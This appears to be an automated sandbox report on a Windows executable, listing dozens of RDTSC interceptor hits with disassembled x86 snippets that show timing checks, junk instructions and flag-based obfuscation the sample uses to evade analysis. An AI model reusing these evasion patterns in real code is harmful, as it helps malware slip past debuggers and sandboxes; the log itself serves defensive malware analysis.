Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717B4C second address: 1717B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1717B52 second address: 1717B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F2273 second address: 17F2277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F2277 second address: 17F227D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1445 second address: 17F1449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1449 second address: 17F144F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F144F second address: 17F147E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F10C481811Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4818129h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F147E second address: 17F149C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E04h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F149C second address: 17F14A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F14A0 second address: 17F14A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1626 second address: 17F164E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F10C4818125h 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F164E second address: 17F1654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1654 second address: 17F165D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F165D second address: 17F1663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1663 second address: 17F1667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1667 second address: 17F166B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1DEC second address: 17F1DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F10C4818116h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1DF8 second address: 17F1DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1DFE second address: 17F1E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10C481811Eh 0x0000000a pushad 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F10C4818116h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1E20 second address: 17F1E26 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1E26 second address: 17F1E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F1F9F second address: 17F1FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C32 second address: 17F7C81 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F10C4818118h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D1F14h] 0x0000002e push dword ptr [ebp+122D2FDAh] 0x00000034 xor edx, dword ptr [ebp+122D37ADh] 0x0000003a call 00007F10C4818119h 0x0000003f pushad 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C81 second address: 17F7C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C87 second address: 17F7C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C90 second address: 17F7C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7C94 second address: 17F7CA9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jl 00007F10C481811Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7CA9 second address: 17F7CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 popad 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F10C4816E03h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F10C4816DF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F7CD5 second address: 17F7CDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 17F95A6 second address: 17F95AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280033 second address: 7280037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280037 second address: 728003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728003B second address: 7280049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280049 second address: 728004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728004D second address: 7280053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280053 second address: 72800A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f pushfd 0x00000010 jmp 00007F10C4816E07h 0x00000015 or si, 6BBEh 0x0000001a jmp 00007F10C4816E09h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72800A4 second address: 72800A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72800A9 second address: 72800E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F10C4816DFDh 0x0000000a and ch, FFFFFFF6h 0x0000000d jmp 00007F10C4816E01h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F10C4816DFDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72800E4 second address: 72800EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72800EA second address: 728012C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e pushad 0x0000000f movsx ebx, si 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 sub esp, 18h 0x00000019 jmp 00007F10C4816E09h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F10C4816DFDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728012C second address: 728019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 jmp 00007F10C4818123h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F10C4818129h 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F10C481811Eh 0x00000019 mov ebx, dword ptr [eax+10h] 0x0000001c pushad 0x0000001d movzx eax, dx 0x00000020 push edi 0x00000021 mov esi, 324ECAE5h 0x00000026 pop esi 0x00000027 popad 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F10C481811Ah 0x00000032 add al, FFFFFFF8h 0x00000035 jmp 00007F10C481811Bh 0x0000003a popfd 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728019D second address: 7280213 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F10C4816E08h 0x00000008 sbb cx, 0D58h 0x0000000d jmp 00007F10C4816DFBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dx, cx 0x00000018 popad 0x00000019 mov dword ptr [esp], esi 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F10C4816E00h 0x00000023 sub cx, 17B8h 0x00000028 jmp 00007F10C4816DFBh 0x0000002d popfd 0x0000002e mov ecx, 3A52A3EFh 0x00000033 popad 0x00000034 mov esi, dword ptr [772406ECh] 0x0000003a pushad 0x0000003b mov ecx, 14E521E7h 0x00000040 mov dx, si 0x00000043 popad 0x00000044 test esi, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280213 second address: 7280217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280217 second address: 7280232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280232 second address: 7280238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280238 second address: 728023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728023C second address: 7280259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F10C4818F2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280259 second address: 7280274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280274 second address: 72802BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 7DFAh 0x00000007 mov dh, 7Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d jmp 00007F10C481811Ah 0x00000012 push eax 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ecx 0x00000016 mov esi, ebx 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b mov edx, 2FF38314h 0x00000020 mov si, bx 0x00000023 popad 0x00000024 call dword ptr [77210B60h] 0x0000002a mov eax, 766BE5E0h 0x0000002f ret 0x00000030 jmp 00007F10C481811Fh 0x00000035 push 00000044h 0x00000037 pushad 0x00000038 mov cx, CF6Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e mov edi, eax 0x00000040 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72802BD second address: 7280303 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F10C4816E00h 0x0000000f popad 0x00000010 mov cl, 49h 0x00000012 popad 0x00000013 push ebx 0x00000014 jmp 00007F10C4816E06h 0x00000019 mov dword ptr [esp], edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F10C4816DFAh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280303 second address: 7280307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280307 second address: 728030D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728030D second address: 728031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C481811Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72803B2 second address: 72804AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov cl, A4h 0x0000000d pushfd 0x0000000e jmp 00007F10C4816E09h 0x00000013 or ah, FFFFFF86h 0x00000016 jmp 00007F10C4816E01h 0x0000001b popfd 0x0000001c popad 0x0000001d je 00007F11347560AFh 0x00000023 pushad 0x00000024 call 00007F10C4816DFCh 0x00000029 mov di, ax 0x0000002c pop eax 0x0000002d pushfd 0x0000002e jmp 00007F10C4816E07h 0x00000033 or cl, 0000006Eh 0x00000036 jmp 00007F10C4816E09h 0x0000003b popfd 0x0000003c popad 0x0000003d sub eax, eax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F10C4816DFDh 0x00000046 jmp 00007F10C4816DFBh 0x0000004b popfd 0x0000004c call 00007F10C4816E08h 0x00000051 mov bx, ax 0x00000054 pop eax 0x00000055 popad 0x00000056 mov dword ptr [esi], edi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b movzx esi, di 0x0000005e pushfd 0x0000005f jmp 00007F10C4816DFBh 0x00000064 or si, 398Eh 0x00000069 jmp 00007F10C4816E09h 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804AA second address: 72804B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804B0 second address: 72804B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804B4 second address: 72804B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804B8 second address: 72804DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007F10C4816DFFh 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804DB second address: 72804E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72804E1 second address: 728051E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007F10C4816E03h 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+4Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F10C4816DFBh 0x00000021 push eax 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728051E second address: 7280524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280524 second address: 7280528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280528 second address: 7280553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b jmp 00007F10C4818123h 0x00000010 mov eax, dword ptr [ebx+50h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov al, bh 0x00000018 mov ax, CAB3h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280553 second address: 72805C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F10C4816DFFh 0x00000009 and ecx, 53794D1Eh 0x0000000f jmp 00007F10C4816E09h 0x00000014 popfd 0x00000015 mov di, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+14h], eax 0x0000001e pushad 0x0000001f mov edi, eax 0x00000021 pushfd 0x00000022 jmp 00007F10C4816E04h 0x00000027 sub ecx, 0D02EA48h 0x0000002d jmp 00007F10C4816DFBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov eax, dword ptr [ebx+54h] 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a movsx edx, cx 0x0000003d mov eax, 31AA9653h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72805C9 second address: 728063D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818129h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F10C481811Ch 0x00000013 xor esi, 08501F08h 0x00000019 jmp 00007F10C481811Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F10C4818128h 0x00000025 adc si, C168h 0x0000002a jmp 00007F10C481811Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+58h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728063D second address: 7280641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280641 second address: 7280647 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280647 second address: 728064D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728064D second address: 7280651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280651 second address: 7280674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b jmp 00007F10C4816E00h 0x00000010 mov eax, dword ptr [ebx+5Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280674 second address: 728068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10C4818123h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728068C second address: 72806BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4816DFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72806BB second address: 72806C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72806C1 second address: 72806C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72806C5 second address: 7280754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+60h] 0x0000000b pushad 0x0000000c jmp 00007F10C4818125h 0x00000011 mov eax, 32F40ED7h 0x00000016 popad 0x00000017 mov dword ptr [esi+24h], eax 0x0000001a jmp 00007F10C481811Ah 0x0000001f mov eax, dword ptr [ebx+64h] 0x00000022 jmp 00007F10C4818120h 0x00000027 mov dword ptr [esi+28h], eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F10C481811Eh 0x00000031 jmp 00007F10C4818125h 0x00000036 popfd 0x00000037 movzx esi, bx 0x0000003a popad 0x0000003b mov eax, dword ptr [ebx+68h] 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F10C4818126h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280754 second address: 728076E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
